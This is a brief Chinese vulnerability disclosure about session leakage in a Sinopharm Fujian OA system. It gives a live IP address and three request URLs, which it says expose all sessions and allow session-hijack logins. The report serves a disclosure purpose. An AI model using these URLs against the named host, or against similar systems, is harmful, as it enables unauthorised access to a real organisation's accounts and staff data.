漏洞细节
多处敏感信息泄露
国药福建OA系统:http://218.5.65.215:8080/yyoa/
session泄露:
http://218.5.65.215:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll

session劫持登陆:

http://218.5.65.215:8080/yyoa/assess/js/initDataAssess.jsp

http://218.5.65.215:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1


发现国药福建OA系统存在多处敏感信息泄露问题,包括session泄露和可能的session劫持登录。受影响的URL包括getSessionList.jsp和initDataAssess.jsp等。

被折叠的 条评论
为什么被折叠?



